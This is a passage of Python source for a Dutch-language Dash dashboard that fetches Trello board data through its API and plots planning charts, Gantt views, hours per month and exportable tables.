        html.Div(className='tab3_div1', style=globals['styles']['maindivs'],
        children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
        'divgraphs'], children=[dcc.Markdown(
        "Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand."
        ), dcc.Markdown(
        "In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'."
        )])]), html.Div(className='tab3_div2', style=globals['styles'][
        'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(
        'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
        dash_table.DataTable(id='table_plattedump', columns=[{'name': i,
        'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable':
        True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']
        ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(
        'records'), hidden_columns=[i for i in data['dfs']['columntypes']],
        export_format='xlsx', export_headers='display', export_columns=
        'all', filter_action='native', sort_action='native', sort_mode=
        'multi', style_table={'overflowX': 'scroll'}, style_header={
        'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
        'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
        'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
        'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),
        html.Div(className='tab3_div3', style=globals['styles']['maindivs'],
        children=[html.H4('Uren per maand'), dcc.Markdown(
        'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'
        ), dcc.Markdown(
        'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'
        ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':
        i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),
        'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in
        data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][
        'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data
        ['dfs']['columntypesurenpermaand']], export_format='xlsx',
        export_headers='display', export_columns='all', filter_action=
        'native', sort_action='native', sort_mode='multi', style_header={
        'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
        'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
        'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
        'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=
        'Langetermijnplanning', style=globals['styles']['tabs'], children=[
        html.Div(className='maindivs', style=globals['styles']['maindivs'],
        children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
        'divgraphs'], children=[dcc.Markdown(
        'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.
        Markdown('De focus hierbij ligt vooral op de categorieen.')])]),
        html.Div(className='maindivs', style=globals['styles']['maindivs'],
        children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(
        style=globals['styles']['dropdowns'], id='dropdownurenpermaand',
        options=[{'label': name, 'value': name} for name in data['arrays'][
        config.get('Custom Field for Categories')] if name != None], multi=
        True, searchable=False, value=data['arrays'][config.get(
        'Custom Field for Categories')]), html.Div(style=globals['styles'][
        'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(
        className='tab1_div3', style=globals['styles']['maindivs'],
        children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.
        Markdown(
        '*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'
        ), dcc.Markdown(
        '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'
        ), dcc.Markdown(
        '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.
        Markdown(
        '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
        ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
        Graph(id='graph_nietingepland', figure={'data': data['graphdata'][
        'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),
        html.Div(className='tab1_div4', style=globals['styles']['maindivs'],
        children=[html.H4('Nog in te plannen uren (per epic)'), dcc.
        Markdown(
        '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
        ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
        Graph(id='graph_nietingepland_epics', figure={'data': data[
        'graphdata']['nietingeplandepics'], 'layout': globals[
        'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][
        'tabs'], label='Tactische planning', children=[html.Div(className=
        'maindivs', style=globals['styles']['maindivs'], children=[html.H3(
        'Uitleg'), dcc.Markdown(
        'In dit tabblad is een middellange termijnplanning te zien.')]),
        html.Div(className='maindivs', style=globals['styles']['maindivs'],
        children=[html.H4('Totalen'), dcc.Markdown(
        'Hieronder staan twee totaaloverzichten van de aankomende maanden.'
        ), dcc.Markdown(
        'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'
        ), dcc.Markdown(
        'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'
        ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
        Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className
        ='maindivs', style=globals['styles']['maindivs'], children=[html.H4
        ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=
        'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in
        data['arrays']['threemonths']], multi=False, searchable=False,
        value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[
        'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])
        ])])])
@app.callback(Output('gantttactisch', 'figure'), [Input(
    'dropdowngantttactisch', 'value')])
def update_gantttactisch(v1):
    """Gantt chart for the tactical-planning tab.

    ``v1`` is the selected month as a ``'YYYYMM'`` string.  All unfinished
    cards ('Niet gestart', 'Doing', 'Blocked') that overlap the selected
    month are drawn, clamped to the window [month - 1, month + 2], and two
    vertical lines mark the boundaries of the selected month.  Returns an
    empty transparent figure when no month is selected.
    """
    if v1 is None:
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    import numpy as np
    from operator import itemgetter

    def _shift_month(yyyymm, delta):
        # Month arithmetic on 'YYYYMM' strings.  The original string-based
        # arithmetic produced an invalid month ('YYYY14') for December + 2.
        total = int(yyyymm[0:4]) * 12 + (int(yyyymm[4:6]) - 1) + delta
        return '%04d%02d' % (total // 12, total % 12 + 1)

    v1min1 = _shift_month(v1, -1)
    v1plus1 = _shift_month(v1, 1)
    v1plus2 = _shift_month(v1, 2)
    monthkey = int(v1)
    # First days of the clamp window: previous month .. month + 2.
    windowstart = datetime.strptime(v1min1 + '01', '%Y%m%d').date()
    windowend = datetime.strptime(v1plus2 + '01', '%Y%m%d').date()
    ganttdata = []
    for j in data['kaarten'].values():
        if j['Status'] not in ['Niet gestart', 'Doing', 'Blocked']:
            continue
        try:
            # Card must overlap the selected month.
            if int(datetime.strftime(j['Begindatum'], '%Y%m')
                   ) <= monthkey and int(datetime.strftime(j['Einddatum'],
                                                           '%Y%m')) >= monthkey:
                start = max(j['Begindatum'].date(), windowstart)
                eind = min(j['Einddatum'].date(), windowend)
                ganttdata.append(dict(Task=j['Epic'], Start=start,
                    Finish=eind, Resource=j['Naam'] + ' (uren: ' +
                    str(round(data['urenperdagperkaart'][j['Naam']]
                    ['urenperperiode'][v1])) + ')'))
        except (AttributeError, TypeError, KeyError):
            # Cards without valid start/end dates are simply skipped.
            pass
    result = sorted(ganttdata, key=itemgetter('Task'))
    # One random RGB colour per bar so adjacent bars stay distinguishable.
    rgb = ['rgb(' + ','.join(map(str, np.random.choice(range(256), size=3)))
           + ')' for _ in result]
    fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True,
        group_tasks=False, showgrid_x=True, showgrid_y=True, colors=rgb)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)')
    # Vertical black lines on the first day of the selected month and of
    # the month after it, delimiting the chosen month.
    for month in (v1, v1plus1):
        boundary = month[0:4] + '-' + month[4:] + '-01'
        fig.add_trace(go.Scatter(mode='lines', x=[boundary, boundary],
            y=[-1, len(result)], line={'shape': 'spline', 'color':
            'black', 'width': 4}, showlegend=False))
    return fig
@app.callback(Output('ganttpersoon', 'figure'), [Input(
    'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
    'value')])
def update_ganttpersoon(v1, v2):
    """Gantt chart of all non-archived cards assigned to person ``v1``
    whose status is in the selected status list ``v2``; bars are coloured
    per epic.  Returns an empty transparent figure when nothing matches.
    """
    ganttdata = []
    for j in data['kaarten'].values():
        if (j[config.get('Custom Field for Person')] == v1 and
                j['Status'] != 'Archived' and j['Status'] in v2):
            try:
                ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
                    'Custom Field for Starting date')].date(), Finish=j[
                    config.get('Custom Field for Ending date')].date(),
                    Resource=j['Epic']))
            except (AttributeError, TypeError, KeyError):
                # Cards without a start or end date cannot be plotted.
                # (Was a bare `except:` which also hid real coding errors.)
                pass
    if not ganttdata:
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    fig = ff.create_gantt(ganttdata, index_col='Resource',
        show_colorbar=True, showgrid_x=True, showgrid_y=True)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)')
    return fig
@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',
    'value')])
def update_ganttepics(value):
    """Gantt chart of all non-archived cards belonging to epic ``value``;
    bars are coloured per status.  Returns an empty transparent figure
    when the epic has no plottable cards.
    """
    ganttdata = []
    for j in data['kaarten'].values():
        if j['Epic'] == value and j['Status'] != 'Archived':
            try:
                ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
                    'Custom Field for Starting date')].date(), Finish=j[
                    config.get('Custom Field for Ending date')].date(),
                    Resource=j['Status']))
            except (AttributeError, TypeError, KeyError):
                # Cards without a start or end date cannot be plotted.
                # (Was a bare `except:` which also hid real coding errors.)
                pass
    if not ganttdata:
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    fig = ff.create_gantt(ganttdata, index_col='Resource',
        show_colorbar=True, showgrid_x=True, showgrid_y=True)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)')
    return fig
@app.callback(Output('urenpermaand', 'figure'), [Input(
    'dropdownurenpermaand', 'value')])
def update_urenpermaand(value):
    """Stacked area chart of planned hours per month, one trace per
    selected category plus a black reference line with the total
    available hours.

    ``value`` is the list of category names selected in the dropdown.
    'Regulier werk' is always appended first so it sits at the bottom of
    the stack.
    """
    layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},
        yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})

    def _hours_per_period(categorie):
        # Planned hours per period, summed over all cards in a category.
        return [round(sum(card['urenperperiode'][periode] for card in
            data['urenperdagperkaart'].values() if card[config.get(
            'Custom Field for Categories')] == categorie), 0)
            for periode in data['arrays']['perioden']]

    def _category_trace(categorie, naam):
        return dict(x=data['arrays']['xaxis_months'], y=
            _hours_per_period(categorie), name=naam, line={'shape':
            'spline', 'smoothing': 0.4}, mode='lines+markers', marker={
            'symbol': 'triangle-up-open', 'size': 10}, stackgroup='one')

    bars = []
    if 'Regulier werk' in value:
        bars.append(_category_trace('Regulier werk', 'Regulier werk'))
    for categorie in data['arrays'][config.get('Custom Field for Categories')]:
        if categorie in value and categorie != 'Regulier werk':
            # None means the card had no category custom field filled in.
            # (Was `categorie == None`; identity test is the idiom.)
            naam = 'Geen categorie' if categorie is None else categorie
            bars.append(_category_trace(categorie, naam))
    # Black reference line: total available hours per month.
    totaal = [round(sum(card['urenperperiode'][periode] for card in data[
        'beschikbareuren'].values()), 0) for periode in data['arrays'][
        'perioden']]
    bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[
        'arrays']['xaxis_months'], y=totaal, size=10, line={'shape':
        'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))
    return {'data': bars, 'layout': layout}
@app.server.route('/dash/configuration/')
def download_file():
    """Flask route serving the raw board configuration file as a download."""
    # cache_timeout=0: always serve the current file, never a cached copy.
    return flask.send_file('./configuration/configuration.txt',
        attachment_filename='configuration.txt', as_attachment=True,
        cache_timeout=0)
# Load the Trello API credentials and per-board configuration that
# deploy.py writes; without them the dashboard cannot start.
try:
    with open('./configuration/credentials.txt') as json_file:
        credentials = json.load(json_file)
    with open('./configuration/configuration.txt') as json_file:
        config = json.load(json_file)
except:
    raise Exception('Draai eerst deploy.py!')
# Dutch locale so strftime month/day names render in Dutch.
locale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')
# Module-wide state shared by the layout and callbacks.
# NOTE: this name shadows the builtin globals().
globals = {'config': config, 'credentials': credentials, 'styles': {}}
# Fetch the boards this token can see; they populate the board dropdown.
board_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +
    credentials.get('API key') + '&token=' + credentials.get('API token'))
boards = json.loads(json.dumps(requests.get(board_url).json()))
globals['boards'] = boards
# Shared CSS style dictionaries used throughout the layout.
globals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',
    'background-image': "url('./assets/left.png')", 'background-repeat':
    'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',
    'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',
    'text-align': 'center', 'border-radius': '10px'}
# NOTE(review): 'background' appears twice below; the second (gradient)
# value wins in the dict literal.
globals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',
    'background': 'rgb(255,255,255)', 'background':
    'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'
    , 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',
    'margin-left': '5px', 'border-radius': '6px'}
globals['styles']['divgraphs'] = {'background-color':
    'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',
    'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',
    'border-radius': '10px'}
globals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}
# Default layout for the stacked bar charts.
globals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor
    ='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}
def get_data(value):
    """Fetch and transform all Trello data for board ``value``.

    Pulls cards, lists, custom fields, labels and members from the Trello
    REST API, flattens them into the ``kaarten`` dict, spreads each card's
    planned hours evenly over its start..end date range, aggregates hours
    per month, and builds the bar/gauge figure data.  The result is stored
    in the module-level ``data`` dict (no return value); ``config`` is
    rebound to this board's section of the configuration file.
    """
    global data
    global config
    with open('./configuration/configuration.txt') as json_file:
        configfile = json.load(json_file)
    config = configfile.get(value)
    # Build the REST endpoints for this board.
    keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(
        'API token')
    trello_base_url = 'https://api.trello.com/1/'
    board_url = trello_base_url + 'boards/' + value
    url_cards = (board_url +
        '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'
        + keys)
    url_lists = board_url + '/lists?filter=all&' + keys
    url_customfields = board_url + '/customFields?' + keys
    url_labels = board_url + '/labels?' + keys
    url_members = board_url + '/members?' + keys
    board = json.loads(json.dumps(requests.get(url_cards).json()))
    lists = json.loads(json.dumps(requests.get(url_lists).json()))
    customfields = json.loads(json.dumps(requests.get(url_customfields).json())
        )
    labels = json.loads(json.dumps(requests.get(url_labels).json()))
    members = json.loads(json.dumps(requests.get(url_members).json()))
    cards = board['cards']
    def dateCalc(date):
        """Parse a Trello ISO timestamp string; None when absent/invalid."""
        try:
            newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
            return newdate
        except:
            return None
    # Index the board's custom field definitions by type and id; list-type
    # fields additionally get an option-id -> option-text map.
    customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},
        'checkbox': {}}
    for i in customfields:
        customfields_dict[i['type']] = {}
    for i in customfields:
        customfields_dict[i['type']][i['id']] = {}
    for i in customfields:
        if i['type'] == 'list':
            customfields_dict[i['type']][i['id']]['name'] = i['name']
            customfields_dict['list'][i['id']]['options'] = {}
            for j in i['options']:
                customfields_dict['list'][i['id']]['options'][j['id']] = j[
                    'value'].get('text')
        else:
            customfields_dict[i['type']][i['id']]['name'] = i['name']
    # All list names that should be kept; cards in other lists are dropped.
    chosenlists = []
    for i in config.get('Not Started'):
        chosenlists.append(i)
    chosenlists.extend(config.get('Blocked'))
    chosenlists.extend(config.get('Doing'))
    chosenlists.extend(config.get('Done'))
    for i in config.get('Epics'):
        chosenlists.append(i)
    for i in config.get('Always continuing'):
        chosenlists.append(i)
    for i in config.get('List with Epics Done'):
        chosenlists.append(i)
    def idtodate(cardid):
        """Creation time of a Trello object: first 8 hex chars of its id
        are a Unix timestamp."""
        hex = cardid[0:8]
        timestamp = int(hex, 16)
        timedate = datetime.fromtimestamp(timestamp)
        return timedate
    def get_epicid(url):
        """Extract the epic card id from an Epic-plugin attachment URL;
        None when the URL is not an epic link."""
        try:
            if 'epicId=' in url:
                start = url.find('epicId=') + 7
                end = url.find('&attachmentId=')
                return url[start:end]
            else:
                pass
        except:
            pass
    # Flatten every card into a plain dict keyed by card id.
    kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i
        ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':
        idtodate(i['id']), 'labels': [label['name'] for label in i['labels'
        ] if i['labels'] != []], 'members': [member['fullName'] for member in
        members if member['id'] in i['idMembers']], 'Sjabloon': i[
        'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i
        ['closed'], 'epicid': [get_epicid(j['url']) for j in i[
        'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in
        cards}
    # Drop non-epic attachments and join member names into one string.
    for i, j in kaarten.items():
        while None in j['epicid']:
            j['epicid'].remove(None)
        if j['members'] != []:
            j['Leden'] = ''
            for k in j['members']:
                if j['Leden'] == '':
                    j['Leden'] += k
                else:
                    j['Leden'] += ', ' + k
        else:
            j['Leden'] = None
        del j['members']
    # Give every card a (None-initialised) key per custom field, then fill
    # in the actual values per field type.
    if customfields_dict != {}:
        for i, j in customfields_dict.items():
            for k, l in j.items():
                for m, n in kaarten.items():
                    n[l['name']] = None
        for i, j in kaarten.items():
            for k in j['customfields']:
                if k['idCustomField'] in customfields_dict['list'].keys():
                    j[customfields_dict['list'][k['idCustomField']].get('name')
                        ] = customfields_dict['list'][k['idCustomField']][
                        'options'].get(k['idValue'])
                elif k['idCustomField'] in customfields_dict['checkbox'].keys(
                    ):
                    if k['value']['checked'] == 'true':
                        j[customfields_dict['checkbox'][k['idCustomField']]
                            .get('name')] = True
                    else:
                        j[customfields_dict['checkbox'][k['idCustomField']]
                            .get('name')] = False
                elif k['idCustomField'] in customfields_dict['date'].keys():
                    j[customfields_dict['date'][k['idCustomField']].get('name')
                        ] = dateCalc(k['value'].get('date'))
                else:
                    for key in k['value']:
                        j[customfields_dict[key][k['idCustomField']].get(
                            'name')] = k['value'].get(key)
    # Resolve each card's epic attachment to the epic card's name/category.
    epicIdNameCategory = []
    for i, j in kaarten.items():
        epicIdNameCategory.append((i, j['Naam'], j[config.get(
            'Custom Field for Categories')]))
    for i, j in kaarten.items():
        if j['epicid'] == []:
            j['Epic'] = 'Geen epic'
            j['Categorie'] = None
        else:
            for k in epicIdNameCategory:
                if k[0] == j['epicid'][0]:
                    j['Epic'] = k[1]
                    j['Categorie'] = k[2]
        del j['epicid']
    # Map each card's Trello list to a status label via the configuration.
    for i, j in kaarten.items():
        for k in lists:
            if j['ListID'] == k['id']:
                j['Lijst'] = k['name']
                if j['Lijst'] in config.get('Not Started'):
                    j['Status'] = 'Niet gestart'
                elif j['Lijst'] in config.get('Doing'):
                    j['Status'] = 'Doing'
                elif j['Lijst'] in config.get('Blocked'):
                    j['Status'] = 'Blocked'
                elif j['Lijst'] in config.get('Done'):
                    j['Status'] = 'Done'
                elif j['Lijst'] in config.get('Always continuing'):
                    j['Status'] = 'Doorlopend'
                elif j['Lijst'] in config.get('Epics'):
                    j['Status'] = 'Epics Doing'
                elif j['Lijst'] in config.get('List with Epics Done'):
                    j['Status'] = 'Epics Done'
                else:
                    j['Status'] = 'Archived'
        del j['customfields']
        del j['ListID']
    # Archived cards keep 'Done', every other archived card is 'Archived'.
    for i, j in kaarten.items():
        if j['Gearchiveerd'] == True and j['Status'] != 'Done':
            j['Status'] = 'Archived'
    # Drop template cards and cards in lists not named in the config.
    liststodelete = []
    for i in lists:
        if i['name'] not in chosenlists:
            liststodelete.append(i['name'])
    cardstodelete = []
    for i, j in kaarten.items():
        if j['Sjabloon'] == True:
            cardstodelete.append(i)
        elif j['Lijst'] in liststodelete:
            cardstodelete.append(i)
    # Capacity cards (one per person/team) live in the 'List for hours'
    # list and define the available hours per month.
    hours = {}
    for i, j in kaarten.items():
        if j['Lijst'] == config.get('List for hours'):
            hours[j['Naam']] = {config['Custom Field for Starting date']: j
                [config['Custom Field for Starting date']], config[
                'Custom Field for Ending date']: j[config[
                'Custom Field for Ending date']], config[
                'Custom Field with hours']: j[config[
                'Custom Field with hours']]}
    for i in cardstodelete:
        if i in kaarten:
            del kaarten[i]
    # Date axis: 183 days of history and 365 days ahead, sorted ascending.
    tmpdatesdict = {}
    now = datetime.now().date()
    numdays = 365
    numdayshistory = 183
    for x in range(0, numdays):
        tmpdatesdict[str(now + timedelta(days=x))] = {}
    for x in range(0, numdayshistory):
        tmpdatesdict[str(now - timedelta(days=x))] = {}
    dates = []
    for i in sorted(tmpdatesdict):
        dates.append(i)
    # Deduplicated option lists for the dropdowns (dict.fromkeys keeps
    # insertion order).
    arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten
        .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i
        [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(
        i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(
        [card['Status'] for card in kaarten.values()])), config.get(
        'Custom Field for Categories'): list(dict.fromkeys([card[config.get
        ('Custom Field for Categories')] for card in kaarten.values()])),
        config.get('Custom Field for Person'): list(dict.fromkeys([(card[
        config.get('Custom Field for Person')] if card[config.get(
        'Custom Field for Person')] != None else 'Geen ' + config.get(
        'Custom Field for Person')) for card in kaarten.values()]))}
    # Per-card hour buckets.  The try variant includes board-specific
    # fields ('Gebied', 'Cognosrapport', ...); boards without those custom
    # fields raise KeyError and fall back to the generic variant.
    try:
        urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
            'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
            'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
            get('Custom Field for Starting date'): kaart[config.get(
            'Custom Field for Starting date')], config.get(
            'Custom Field for Ending date'): kaart[config.get(
            'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],
            config.get('Custom Field for Person'): kaart[config.get(
            'Custom Field for Person')], config.get(
            'Custom Field for Categories'): kaart[config.get(
            'Custom Field for Categories')], config.get(
            'Custom Field with hours'): kaart[config.get(
            'Custom Field with hours')], 'Cognosrapport': kaart[
            'Cognosrapport'], 'Niet meenemen in telling': kaart[
            'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':
            kaart['Status'], 'urenperdag': {i: (0) for i in dates},
            'urenperperiode': {i: (0) for i in arrays['perioden']}} for
            kaart in kaarten.values()}
    except:
        urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
            'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
            'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
            get('Custom Field for Starting date'): kaart[config.get(
            'Custom Field for Starting date')], config.get(
            'Custom Field for Ending date'): kaart[config.get(
            'Custom Field for Ending date')], config.get(
            'Custom Field for Person'): kaart[config.get(
            'Custom Field for Person')], config.get(
            'Custom Field for Categories'): kaart[config.get(
            'Custom Field for Categories')], config.get(
            'Custom Field with hours'): kaart[config.get(
            'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':
            kaart['Status'], 'urenperdag': {i: (0) for i in dates},
            'urenperperiode': {i: (0) for i in arrays['perioden']}} for
            kaart in kaarten.values()}
    beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},
        'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in
        hours.keys()}
    # Spread each card's planned hours evenly over its start..end range;
    # capacity cards spread their monthly hours over 30.4 days/month.
    # The bare excepts deliberately skip cards with missing/invalid dates.
    for i in dates:
        datekey = datetime.strptime(i, '%Y-%m-%d').date()
        for k, l in kaarten.items():
            if l['Niet meenemen in telling'] != True:
                try:
                    if l[config.get('Custom Field for Starting date')].date(
                        ) < datekey <= l[config.get(
                        'Custom Field for Ending date')].date():
                        delta = l[config.get('Custom Field for Ending date')
                            ] - l[config.get('Custom Field for Starting date')]
                        hoursperday = int(l[config.get(
                            'Custom Field with hours')]) / int(delta.days)
                        urenperdagperkaart[l['Naam']]['urenperdag'][i
                            ] = hoursperday
                except:
                    pass
        for k, l in hours.items():
            try:
                if l[config.get('Custom Field for Starting date')].date(
                    ) < datekey <= l[config.get('Custom Field for Ending date')
                    ].date():
                    hoursperday = int(l[config.get('Custom Field with hours')]
                        ) / int(30.4)
                    beschikbareuren[k]['urenperdag'][i] = hoursperday
            except:
                pass
    # Aggregate the daily buckets into per-month ('YYYYMM') totals.
    for i, j in urenperdagperkaart.items():
        for k, l in j['urenperdag'].items():
            for m in j['urenperperiode'].keys():
                if m == k[0:4] + k[5:7]:
                    j['urenperperiode'][m] += l
    for i, j in beschikbareuren.items():
        for k, l in j['urenperdag'].items():
            for m in j['urenperperiode'].keys():
                if m == k[0:4] + k[5:7]:
                    j['urenperperiode'][m] += l
    # Flattened copy for the 'Uren per maand' export table: one column per
    # month instead of the nested urenperperiode dict.
    dfurenpermaand = copy.deepcopy(urenperdagperkaart)
    for i, j in dfurenpermaand.items():
        try:
            j['Geplande uren'] = int(j['Geplande uren'])
        except:
            j['Geplande uren'] = 0
        for k, l in j['urenperperiode'].items():
            j[k] = round(l, 2)
        del j['urenperperiode']
    # Bar chart: unscheduled hours (no start/end date yet) per Trello list.
    bars = []
    labelsnietingepland = []
    for j in kaarten.values():
        if j[config.get('Custom Field for Starting date')] == None and j[config
            .get('Custom Field for Ending date')] == None and j[config.get(
            'Custom Field with hours')] != None and j['Status'
            ] == 'Niet gestart':
            labelsnietingepland.append(j['Lijst'])
    labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
    for i, j in kaarten.items():
        if j[config.get('Custom Field for Starting date')] == None and j[config
            .get('Custom Field for Ending date')] == None and j[config.get(
            'Custom Field with hours')] != None and j['Status'
            ] == 'Niet gestart':
            tmp = []
            for label in labelsnietingepland:
                if j['Lijst'] == label:
                    tmp.append(int(j['Geplande uren']))
                else:
                    tmp.append(0)
            bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],
                type='bar', opacity='0.6'))
    # Bar chart: unscheduled hours summed per epic (zero totals dropped).
    epicbars = []
    tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in
        kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
    tmpepicsforbarchart['Geen epic'] = 0
    for i, j in kaarten.items():
        if j[config.get('Custom Field for Starting date')] == None and j[config
            .get('Custom Field for Ending date')] == None and j[config.get(
            'Custom Field with hours')] != None and j['Status'
            ] == 'Niet gestart':
            tmpepicsforbarchart[j['Epic']] += int(j[config.get(
                'Custom Field with hours')])
    epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
    epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[
        value for value in epicsforbarchart.values()], type='bar', text=[
        value for value in epicsforbarchart.values()], textposition=
        'outside', opacity='0.6'))
    # Gauges: planned vs. available hours for this month and the next two.
    thismonth = datetime.strftime(datetime.now(), '%Y%m')
    nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
    twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
    arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,
        '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,
        '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,
        '%Y%m').strftime('%B'))]
    gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart
        .values() for keys, value in card['urenperperiode'].items() if keys ==
        thismonth]))
    gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart
        .values() for keys, value in card['urenperperiode'].items() if keys ==
        nextmonth]))
    gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart
        .values() for keys, value in card['urenperperiode'].items() if keys ==
        twomonths]))
    deltathismonth = round(sum([value for card in beschikbareuren.values() for
        keys, value in card['urenperperiode'].items() if keys == thismonth]))
    deltanextmonth = round(sum([value for card in beschikbareuren.values() for
        keys, value in card['urenperperiode'].items() if keys == nextmonth]))
    deltatwomonths = round(sum([value for card in beschikbareuren.values() for
        keys, value in card['urenperperiode'].items() if keys == twomonths]))
